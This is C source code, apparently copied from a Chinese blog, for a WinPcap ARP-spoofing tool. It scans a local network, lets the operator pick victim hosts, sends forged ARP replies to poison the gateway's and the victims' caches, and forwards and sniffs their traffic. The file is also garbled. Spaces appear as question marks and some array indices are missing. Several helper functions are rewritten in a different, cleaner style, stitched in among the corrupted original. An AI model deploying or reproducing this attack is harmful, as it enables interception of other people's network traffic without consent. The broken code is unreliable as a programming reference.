unsigned?short?arp_opt;
unsigned?char?arp_sha[6];
unsigned?long?arp_spa;
unsigned?char?arp_tha[6];
unsigned?long?arp_tpa;
}ARPHDR,*PARPHDR;
typedef?struct?acttiveIpwithMac?//用于存儲ip與對應mac的結構
{
acttiveIpwithMac*?next;
unsigned?long?ip;
unsigned?char?mac[6];
}acttiveIpwithMac,*PacttiveIpwithMac;
char?*iptos(u_long?in);?//用來將網絡的ip地址轉換成4字節形式?
void?ifprint(pcap_if_t?*d);?//顯示pcap_if結構的信息
int?macequal(PacttiveIpwithMac?m,PacttiveIpwithMac?n);?//判斷兩個mac是否相同
int?getmmac();?//獲得自己mac的函數.用pcap實現.當讓還可以用GetAdaptersInfo來獲得
unsigned?int?_stdcall?sendpackettogetallacttiveIpwithMac(void?*x);?//向局域網內發arp請求包掃描
unsigned?int?_stdcall?recvpackettogetallacttiveIpwithMac(void?*x);?//接受并存儲局域網的arp響應信息
unsigned?int?_stdcall?sproof(void?*x);?//欺騙某一特定的主機,需傳遞主機的序號,序號由掃描獲得
unsigned?int?_stdcall?transmitandsniffer(void?*x);?//轉發包的線程
int?Getgatewayip(ULONG?choosedip);?//獲取本地的網關ip
//
PacttiveIpwithMac?myip,gateip,Pipmachead=NULL;?//定義全局變量記錄我的和網關的ip和mac
ULONG?mynetmask;?//我的子網掩碼
pcap_t?*slecadopt;?//指向選擇網卡的指針?
int?Ssendover=0;?//用于控制線程的標志
int?cheat[MOSTCHEATNUMBER];?//用于控制欺騙線程的標志
///
int?main()?
{
???myip=new?acttiveIpwithMac;?//記錄自己的ip
gateip=new?acttiveIpwithMac;?//記錄網關的ip
u_long?sendarphd,recvarphd,transhd,sproofhd[MOSTCHEATNUMBER];?//用于線程控制的變量
???PacttiveIpwithMac?z,k,j;
???unsigned?sendarpid,recvarpid,transid,sproofid[MOSTCHEATNUMBER];?//用于線程控制的變量
???pcap_if_t?*alldevs,*d;?//pcap里對網卡的控制量
int?i=0,m,maxactive,inum;
char?error[PCAP_ERRBUF_SIZE];?
???
/*?獲得網卡的列表?*/
if?(pcap_findalldevs(&alldevs,?error)?==?-1)
{
fprintf(stderr,"Error?in?pcap_findalldevs:?%s\n",?error);
return?-1;
}
/*?打印網卡信息?*/
for(d=alldevs;?d;?d=d->next)
{
printf("%d.?",?++i);
???ifprint(d);?/*?循環調用ifprint()?來顯示pcap_if結構的信息*/
if?(d->description)
printf("?(%s)\n",?d->description);
else
printf("?(No?description?available)\n");
}
???
if(i==0)
{
printf("\nNo?interfaces?found!?Make?sure?WinPcap?is?installed.\n");
return?-1;
}
printf("Enter?the?interface?number?(1-%d):",i);
scanf("%d",?&inum);?//輸入要選擇打開的網卡號
if(inum?<?1?||?inum?>?i)?//判斷號的合法性
{
printf("\nInterface?number?out?of?range.\n");
/*?Free?the?device?list?*/
pcap_freealldevs(alldevs);
return?-1;
}
/*?找到要選擇的網卡結構?*/
for(d=alldevs,?i=0;?i<?inum-1?;d=d->next,?i++);
???/*找到我的ip*/
???myip->ip=((struct?sockaddr_in?*)d->addresses->addr)->sin_addr.s_addr;
???/*獲得選擇網卡的子網掩碼*/
???mynetmask=((struct?sockaddr_in?*)d->addresses->netmask)->sin_addr.s_addr;
???//printf("netmask:%s\n\n",iptos(mynetmask));
/*?打開選擇的網卡?*/
if((slecadopt?=?pcap_open_live(d->name,?1000,?1,?1,?error)?)?==?NULL)
{
fprintf(stderr,"\nError?opening?adapter:?%s\n",?error);
???pcap_freealldevs(alldevs);
return?-1;
}
/*獲取網關的信息*/
if(Getgatewayip(myip->ip))
???printf("\tGateway:?%s\n",iptos(gateip->ip));
/*獲取本地mac*/
???while(getmmac()==0);
???printf("my?mac:?%02x:%02x:%02x:%02x:%02x:%02x\n\n",myip->mac[0],myip->mac[1],myip->mac[2],myip->mac[3],myip->mac[4],myip->mac[5]);
/*掃描局域網內活動主機*/
sendarphd=_beginthreadex(NULL,0,sendpackettogetallacttiveIpwithMac,0,0,&sendarpid);//開啟arp掃描包線程
???recvarphd=_beginthreadex(NULL,0,recvpackettogetallacttiveIpwithMac,0,0,&recvarpid);//開啟接收arp響應包線程
WaitForSingleObject((HANDLE)sendarphd,INFINITE);?//主線程停止等待發送線程結束
???for(m=5;m>0;m--)
???{
???printf("scanning\n");
Sleep(500);?//等待回應包到達,共等2500ms.不夠可調
???}
???Ssendover=1;//置標志,停止接收線程
???WaitForSingleObject((HANDLE)recvarphd,INFINITE);?//主線程停止等待接收線程結束
???if(Pipmachead!=NULL)
???{
???/*去處重復的活動主機*/
???for(k=Pipmachead;k->next!=NULL;k=k->next)
???for(z=k;z->next!=NULL;)
???{
???if((k->ip==z->next->ip)&&(macequal(k,z->next)))
???{
j=z->next;
???z->next=j->next;
???delete?j;
???}
???else
z=z->next;
???}
???/*輸出列表*/
???for(z=Pipmachead,i=1;z!=NULL;z=z->next,i++)
printf("%-3d?ip=%-20s?mac=%02x:%02x:%02x:%02x:%02x:%02x\n",i,iptos(z->ip),z->mac[0],z->mac[1],z->mac[2],z->mac[3],z->mac[4],z->mac[5]);
???}
???for(k=Pipmachead;k->next!=NULL;k=k->next)
if(k->ip==gateip->ip)
gateip=k;
???maxactive=i-1;
???CloseHandle((HANDLE)sendarphd);
???CloseHandle((HANDLE)recvarphd);
???transhd=_beginthreadex(NULL,0,transmitandsniffer,0,0,&transid);?//開啟轉發線程
printf("transmitandsniffer已經開始了!!\n");
???for(i=0;i<256;i++)
cheat=0;
???printf("已經得到了本局域網的活動主機!!!\n選擇你想欺騙的機器序號一次一臺:");
printf("選擇你想欺騙的機器序號:\n");
???for(;;)
???{
???scanf("%d",&i);
???if(i>0&&i<=maxactive)
???{
???if(cheat[i-1]==0)
???{
???cheat[i-1]=1;
???sproofhd[i-1]=_beginthreadex(NULL,0,sproof,&i,0,&sproofid[i-1]);
???}
???else
???printf("\n%d號機已經欺騙了!!大佬!!\n",i);
???}
???else?if(i<0&&i>=-maxactive)
???{
???if(cheat[-i-1]==1)
???{
cheat[-i-1]=0;
CloseHandle((HANDLE)sproofhd[i-1]);
???}
???else
???printf("\n%d號機沒欺騙怎么結束啊!!大佬!!\n",-i);
???}
???else?if(i>maxactive||-i>maxactive)
???{
???printf("\n沒有這么多機器,大哥,只有%d臺!!\n",maxactive);
???}
???else
???{
for(i=0;i<256;i++)
???cheat=0;
???}
???Sleep(100);
Sleep(100);
???Sleep(100);
???Sleep(100);
for(i=0;i<256;i++)
if(cheat==1)
???printf("\n%d號機正在被欺騙和嗅探選擇,想退出對此機的嗅探輸入-%d",i+1,i+1);
Sleep(100);
???Sleep(100);
???printf("\n選擇你想嗅探的機器序號:");
???
???}
???return?1;
}
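#ifndef IPTOSBUFFERS
#define IPTOSBUFFERS 12 /* fallback so this block builds standalone; the file defines it above */
#endif

/*
 * iptos - format an IPv4 address (network byte order, as stored in
 * sockaddr_in.sin_addr) as dotted-decimal text.
 *
 * Returns a pointer into a ring of IPTOSBUFFERS static buffers, so up to
 * IPTOSBUFFERS results may be alive at once (several calls inside a single
 * printf() are fine).  The ring is NOT thread-safe: this file calls iptos()
 * from main() and from worker threads, and concurrent calls can race on
 * `which` and overwrite each other's output.
 */
char *iptos(u_long in)
{
    enum { IPTOS_LEN = 3 * 4 + 3 + 1 };        /* "255.255.255.255" + NUL */
    static char output[IPTOSBUFFERS][IPTOS_LEN];
    static short which;
    unsigned char p[4];

    /* Copy the first four bytes in memory, exactly what the original
     * (u_char *)&in cast read; avoids the aliasing cast. */
    memcpy(p, &in, sizeof p);
    which = (which + 1 == IPTOSBUFFERS) ? 0 : which + 1;
    /* snprintf bounds the write even though the widest output fits. */
    snprintf(output[which], sizeof output[which], "%u.%u.%u.%u", p[0], p[1], p[2], p[3]);
    return output[which];
}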
/*
 * macequal - compare the MAC addresses of two host records.
 * Returns 1 when all six bytes are identical, 0 otherwise.
 * Neither argument may be NULL.
 */
int macequal(PacttiveIpwithMac m, PacttiveIpwithMac n)
{
    return (memcmp(m->mac, n->mac, sizeof m->mac) == 0) ? 1 : 0;
}
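/*
 * ifprint - print one pcap interface: name, description, loopback flag and,
 * for every AF_INET address attached to it, the address plus whichever of
 * netmask / broadcast / destination pointers are present.
 *
 * Address entries whose `addr` pointer is NULL are skipped instead of being
 * dereferenced (the original read sa_family before checking the pointer);
 * the optional netmask/broadaddr/dstaddr pointers are checked one by one, as
 * libpcap does not guarantee them.  Other address families are reported as
 * "Unknown".  Output goes to stdout via iptos().
 */
void ifprint(pcap_if_t *d)
{
    pcap_addr_t *a;

    printf("%s\n", d->name);
    if (d->description)
        printf("\tDescription: %s\n", d->description);
    printf("\tLoopback: %s\n", (d->flags & PCAP_IF_LOOPBACK) ? "yes" : "no");

    for (a = d->addresses; a; a = a->next)
    {
        /* Guard before the first dereference of a->addr. */
        if (a->addr == NULL)
            continue;
        printf("\tAddress Family: #%d\n", a->addr->sa_family);
        switch (a->addr->sa_family)
        {
        case AF_INET:
            printf("\tAddress Family Name: AF_INET\n");
            printf("\tAddress: %s\n", iptos(((struct sockaddr_in *)a->addr)->sin_addr.s_addr));
            if (a->netmask)
                printf("\tNetmask: %s\n", iptos(((struct sockaddr_in *)a->netmask)->sin_addr.s_addr));
            if (a->broadaddr)
                printf("\tBroadcast Address: %s\n", iptos(((struct sockaddr_in *)a->broadaddr)->sin_addr.s_addr));
            if (a->dstaddr)
                printf("\tDestination Address: %s\n", iptos(((struct sockaddr_in *)a->dstaddr)->sin_addr.s_addr));
            break;
        default:
            printf("\tAddress Family Name: Unknown\n");
            break;
        }
    }
}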
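/*
 * Getgatewayip - find the default gateway of the adapter whose IPv4 address
 * is `choosedip` (network byte order) using GetAdaptersInfo().
 *
 * On success the gateway address is stored into the global gateip->ip and
 * 1 is returned.  Returns 0 when no adapter carries choosedip, when the
 * matching adapter has no gateway entry, or when allocation / the IP Helper
 * call fails.  The adapter buffer is released on every return path (the
 * original leaked it), and the caller-supplied address is used instead of
 * the global myip->ip (main() passes myip->ip, so behaviour is unchanged).
 */
int Getgatewayip(ULONG choosedip)
{
    int found = 0;
    ULONG ulOutBufLen = sizeof(IP_ADAPTER_INFO);
    PIP_ADAPTER_INFO pAdapterInfo = (IP_ADAPTER_INFO *) malloc(ulOutBufLen);
    if (pAdapterInfo == NULL)
        return 0;

    /* First call only sizes the buffer; the list is usually longer than one entry. */
    if (GetAdaptersInfo(pAdapterInfo, &ulOutBufLen) == ERROR_BUFFER_OVERFLOW)
    {
        free(pAdapterInfo);
        pAdapterInfo = (IP_ADAPTER_INFO *) malloc(ulOutBufLen);
        if (pAdapterInfo == NULL)
            return 0;
    }

    if (GetAdaptersInfo(pAdapterInfo, &ulOutBufLen) == NO_ERROR)
    {
        PIP_ADAPTER_INFO pAdapter;
        for (pAdapter = pAdapterInfo; pAdapter != NULL; pAdapter = pAdapter->Next)
        {
            if (choosedip != inet_addr(pAdapter->IpAddressList.IpAddress.String))
            {
                printf("\t***\n");   /* progress marker kept from the original */
                continue;
            }
            /* An adapter with no configured gateway typically carries an empty
             * string here, which inet_addr() maps to INADDR_NONE; report that
             * as "not found" rather than handing 255.255.255.255 to the caller. */
            ULONG gw = inet_addr(pAdapter->GatewayList.IpAddress.String);
            if (gw != INADDR_NONE)
            {
                gateip->ip = gw;
                found = 1;
            }
            break;
        }
    }

    free(pAdapterInfo);
    return found;
}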
int?getmmac()
{?
unsigned?char?sendbuf[42];
int?i=7,k;
ETHDR?eth;
ARPHDR?arp;
struct?pcap_pkthdr?*?pkt_header;
u_char?*?pkt_data;?
for(k=0;k<6;k++)
{
eth.eh_dst[k]=0xff;
eth.eh_src[k]=0x0f;
arp.arp_sha[k]=0x0f;
arp.arp_tha[k]=0x00;
}
eth.eh_type=htons(ETH_ARP);
arp.arp_hdr=htons(ARP_HARDWARE);
arp.arp_pro=htons(ETH_IP);
arp.arp_hln=6;
arp.arp_pln=4;
arp.arp_opt=htons(ARP_REQUEST);
arp.arp_tpa=myip->ip;
arp.arp_spa=inet_addr("127.0.0.2");?//隨便設的請求方ip
memset(sendbuf,0,sizeof(sendbuf));
memcpy(sendbuf,e,sizeof(eth));
memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));
if(pcap_sendpacket(slecadopt,sendbuf,42)==0)
{
printf("PacketSend?succeed\n\n");
}
else
{
printf("PacketSendPacket?in?getmine?Error:?%d\n",GetLastError());
return?0;
}
while((k=pcap_next_ex(slecadopt,&pkt_header,(const?u_char**)&pkt_data))>=0)
{?
if(*(unsigned?short?*)(pkt_data+12)==htons(ETH_ARP)&&*(unsigned?short*)(pkt_data+20)==htons(ARP_REPLY)&&*(unsigned?long*)(pkt_data+38)==inet_addr("127.0.0.2"))
{
for(i=0;i<6;i++)
{
myip->mac=*(unsigned?char*)(pkt_data+22+i);
}
break;
}
}
if(i==6)
{
return?1;
}
else
{
return?0;
}
}
unsigned?int?_stdcall?sendpackettogetallacttiveIpwithMac(void?*x)
{?
ULONG?tip,subnetsta,subnetend;
unsigned?char?sendbuf[42];
int?k;
ETHDR?eth;
ARPHDR?arp;
subnetsta=htonl(myip->ip&mynetmask);?//計算內網ip起點
subnetend=htonl(htonl(subnetsta)|(~mynetmask));?//計算內網ip結束
for(k=0;k<6;k++)
{
eth.eh_dst[k]=0xff;
eth.eh_src[k]=myip->mac[k];
arp.arp_sha[k]=myip->mac[k];
arp.arp_tha[k]=0x00;
}
eth.eh_type=htons(ETH_ARP);
arp.arp_hdr=htons(ARP_HARDWARE);
arp.arp_pro=htons(ETH_IP);
arp.arp_hln=6;
arp.arp_pln=4;
arp.arp_opt=htons(ARP_REQUEST);
arp.arp_spa=myip->ip;
memset(sendbuf,0,sizeof(sendbuf));
memcpy(sendbuf,e,sizeof(eth));
for(tip=subnetsta;tip<=subnetend;tip++)
{
arp.arp_tpa=htonl(tip);
memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));
???if(pcap_sendpacket(slecadopt,sendbuf,42)!=0)
{
printf("Getallactive?ip?PacketSendPacket?in?getmine?Error:?%d\n",GetLastError());
return?0;
}
}
return?1;
}
unsigned?int?_stdcall?recvpackettogetallacttiveIpwithMac(void?*x)
{?
struct?pcap_pkthdr?*?pkt_header;
u_char?*?pkt_data;?
PacttiveIpwithMac?p,q;
int?i;
while((pcap_next_ex(slecadopt,&pkt_header,(const?u_char**)&pkt_data))>0)
{?
if(*(unsigned?short?*)(pkt_data+12)==htons(ETH_ARP)&&*(unsigned?short*)(pkt_data+20)==htons(ARP_REPLY)&&*(unsigned?long*)(pkt_data+38)==myip->ip)
{
p=new?acttiveIpwithMac;
p->next=NULL;
p->ip=*(unsigned?long*)(pkt_data+28);
for(i=0;i<6;i++)
{
???p->mac=*(unsigned?char*)(pkt_data+22+i);
}
if(Pipmachead==NULL)
{?
???Pipmachead=p;
q=p;
}
else
{
q->next=p;
q=p;
}?
}
if(Ssendover==1)
{
???return?1;
}
}
return?1;
}
unsigned?int?_stdcall?transmitandsniffer(void?*x)
{
struct?changemac
{
unsigned?char?mac[12];
};
unsigned?char?bcast[6];
memset(bcast,0xff,sizeof(bcast));
unsigned?char?sendbuf[1600];
struct?pcap_pkthdr?*?pkt_header;
u_char?*?pkt_data;
changemac?*cmac,*togatewaymac;
PacttiveIpwithMac?z;
int?i,j;
cmac=new?changemac;
togatewaymac=new?changemac;
memcpy(togatewaymac->mac,gateip->mac,6);
memcpy(togatewaymac->mac+6,myip->mac,6);
//printf("1have?run?to?here!!!\n");
while((j=pcap_next_ex(slecadopt,&pkt_header,(const?u_char**)&pkt_data))>=0)
{?
???if(j==0)
{
//printf("2have?run?to?here!!!\n");
continue;
}
if(*(unsigned?short?*)(pkt_data+12)==htons(ETH_IP)&&(!(memcmp(pkt_data+6,myip->mac,6)==0))&&*(unsigned?long?*)(pkt_data+30)!=myip->ip&&(!(memcmp(pkt_data,bcast,6)==0)))//(*(unsigned?char*)(pkt_data+6)==myip->mac[0]&&*(unsigned?char*)(pkt_data+7)==myip->mac[1]&&*(unsigned?char*)(pkt_data+8)==myip->mac[2]&&*(unsigned?char*)(pkt_data+9)==myip->mac[3]&&*(unsigned?char*)(pkt_data+10)==myip->mac[4]&&*(unsigned?char*)(pkt_data+11)==myip->mac[5])))
{
//if()//(!(*(unsigned?char*)(pkt_data+0)==0xff&&*(unsigned?char*)(pkt_data+1)==0xff&&*(unsigned?char*)(pkt_data+2)==0xff&&*(unsigned?char*)(pkt_data+3)==0xff&&*(unsigned?char*)(pkt_data+4)==0xff&&*(unsigned?char*)(pkt_data+5)==0xff))&&)
//{?//for(i=0;i<6;i++)
//?printf("%02x:",*(unsigned?char*)(pkt_data+i));
//printf("33have?run?to?here!!!\n");
memcpy(sendbuf,pkt_data,pkt_header->caplen);
???memcpy(sendbuf,togatewaymac,12);
for(z=Pipmachead;z!=NULL;z=z->next)
{//printf("444have?run?to?here!!!\n");
???if(*(unsigned?long?*)(pkt_data+30)==z->ip)
{
???i=0;
//printf("jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjip=%s",iptos(z->ip));
???//for(;i<6;i++)
???//cmac->mac=z->mac;
memcpy(cmac->mac,z->mac,6);
???//for(;i<12;i++)
???//cmac->mac=myip->mac[i-6];
memcpy(cmac->mac+6,myip->mac,6);
???//memset(sendbuf,0,sizeof(sendbuf));
???memcpy(sendbuf,cmac,12);
??????/*if(*///!=0)
break;
//{
???//?printf("tansmit?Error:?%d\n",GetLastError());
???//?return?0;
//?}
}?
}
pcap_sendpacket(slecadopt,sendbuf,pkt_header->caplen);
???
//}//printf("getip:%s?len:%d\n",iptos(*(unsigned?long?*)(pkt_data+30)),pkt_header->caplen);
}
}
return?1;
}
unsigned?int?_stdcall?sproof(void?*x)
{
int?j,i=*(int*)x;
unsigned?char?sendbuftogate[42],sendbuftosp[42],rsendbuftogate[42],rsendbuftosp[42];
PacttiveIpwithMac?spip;
ETHDR?eth;
ARPHDR?arp;
int?k;
for(spip=Pipmachead,j=0;j<i-1;spip=spip->next,j++);
printf("%-3d?ip=%-20s?mac=%02x:%02x:%02x:%02x:%02x:%02x\n",i,iptos(spip->ip),spip->mac[0],spip->mac[1],spip->mac[2],spip->mac[3],spip->mac[4],spip->mac[5]);
for(k=0;k<6;k++)
{
eth.eh_dst[k]=gateip->mac[k];
eth.eh_src[k]=myip->mac[k];
arp.arp_sha[k]=myip->mac[k];
arp.arp_tha[k]=gateip->mac[k];
}
eth.eh_type=htons(ETH_ARP);
arp.arp_hdr=htons(ARP_HARDWARE);
arp.arp_pro=htons(ETH_IP);
arp.arp_hln=6;
arp.arp_pln=4;
arp.arp_opt=htons(ARP_REPLY);
arp.arp_spa=spip->ip;
arp.arp_tpa=gateip->ip;
memset(sendbuftogate,0,sizeof(sendbuftogate));
memcpy(sendbuftogate,e,sizeof(eth));
memcpy(sendbuftogate+sizeof(eth),&arp,sizeof(arp));
for(k=0;k<6;k++)
{
eth.eh_dst[k]=spip->mac[k];
eth.eh_src[k]=myip->mac[k];
arp.arp_sha[k]=myip->mac[k];
arp.arp_tha[k]=spip->mac[k];
}
arp.arp_spa=gateip->ip;
arp.arp_tpa=spip->ip;
memset(sendbuftosp,0,sizeof(sendbuftosp));
memcpy(sendbuftosp,e,sizeof(eth));
memcpy(sendbuftosp+sizeof(eth),&arp,sizeof(arp));
for(k=0;k<6;k++)
{
eth.eh_dst[k]=spip->mac[k];
eth.eh_src[k]=gateip->mac[k];
arp.arp_sha[k]=gateip->mac[k];
arp.arp_tha[k]=spip->mac[k];
}
arp.arp_spa=gateip->ip;
arp.arp_tpa=spip->ip;
memset(rsendbuftosp,0,sizeof(rsendbuftosp));
memcpy(rsendbuftosp,e,sizeof(eth));
memcpy(rsendbuftosp+sizeof(eth),&arp,sizeof(arp));
for(k=0;k<6;k++)
{
eth.eh_dst[k]=gateip->mac[k];
eth.eh_src[k]=spip->mac[k];
arp.arp_sha[k]=spip->mac[k];
arp.arp_tha[k]=gateip->mac[k];
}
arp.arp_spa=spip->ip;
arp.arp_tpa=gateip->ip;
memset(rsendbuftogate,0,sizeof(rsendbuftogate));
memcpy(rsendbuftogate,e,sizeof(eth));
memcpy(rsendbuftogate+sizeof(eth),&arp,sizeof(arp));
printf("已經進入%d號機的欺騙!!!\n",i);
while(TRUE)
{?
if(pcap_sendpacket(slecadopt,sendbuftogate,42)!=0)
{
???printf("sendbuftogate?Error:?%d\n",GetLastError());
???return?0;
}
???if(pcap_sendpacket(slecadopt,sendbuftosp,42)!=0)
{
???printf("sendbuftosp?Error:?%d\n",GetLastError());
???return?0;
}
Sleep(980);
if(cheat[i-1]==0)?//重置被欺騙的目標機!!
{
for(j=10;j>0;j--)
{
if(pcap_sendpacket(slecadopt,rsendbuftogate,42)!=0)
{
???printf("sendbuftogate?Error:?%d\n",GetLastError());
???return?0;
}
???if(pcap_sendpacket(slecadopt,rsendbuftosp,42)!=0)
{
???printf("sendbuftosp?Error:?%d\n",GetLastError());
???return?0;
}
}
printf("已經退出對%d號機的欺騙!!!\n",i);
return?1;
}
}
}
from:?http://www.cnblogs.com/qq78292959/archive/2008/10/13/2077113.html
總結